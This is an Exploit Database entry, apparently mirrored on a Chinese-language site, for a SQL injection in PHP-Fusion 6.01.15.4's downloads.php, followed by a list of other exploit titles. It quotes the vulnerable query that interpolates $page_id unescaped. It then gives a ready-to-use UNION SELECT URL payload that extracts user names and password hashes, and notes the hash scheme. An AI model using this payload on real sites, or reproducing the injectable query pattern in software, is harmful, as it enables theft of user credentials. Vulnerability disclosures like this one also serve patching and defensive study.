PHP-Fusion 6.01.15.4 – ‘downloads.php’ SQL Injection

Exploit Database
12 阅读

作者： Inj3ct0r

日期： 2010-03-14
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11726/

===================================================================
PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability
===================================================================
#[+] Discovered By : Inj3ct0r
#[+] Site: Inj3ct0r.com
#[+] support e-mail: submit[at]inj3ct0r.com


Product: PHP-Fusion 
Version: 6.01.15.4

Error in file downloads.php

PHP code:

$result = dbquery("SELECT * FROM ".$db_prefix."downloads WHERE download_id='$page_id'");

A vulnerable parameter $ page_id


Exploit:

downloads.php?page_id=-1%27+union+select+1,2,user_name,4,user_password,6,7,8,9,10,11,12,13,14,15,16,17+from+rusfusion_users+limit+0,1/*

password is encrypted by: md5 (md5 ($ pass))


# ~- [ [ : Inj3ct0r : ] ]

last Exploits
PHP-Fusion 6.01.15.4 – ‘downloads.php’ SQL Injection的更多信息

ZeusCart 4.0 – SQL Injection：
YCommerce – Multiple SQL Injections：
Joomla! Component com_joomportfolio – Blind Injection：
CMS Made Simple 2.2.14 – Arbitrary File Upload (Authenticated)：
WordPress Plugin Freshmail 1.5.8 – SQL Injection：
PHP-Fusion 9.03.60 – PHP Object Injection：
WordPress Plugin wp-gpx-map 1.1.21 – Arbitrary File Upload：
Micro Blog Script – SQL Injection：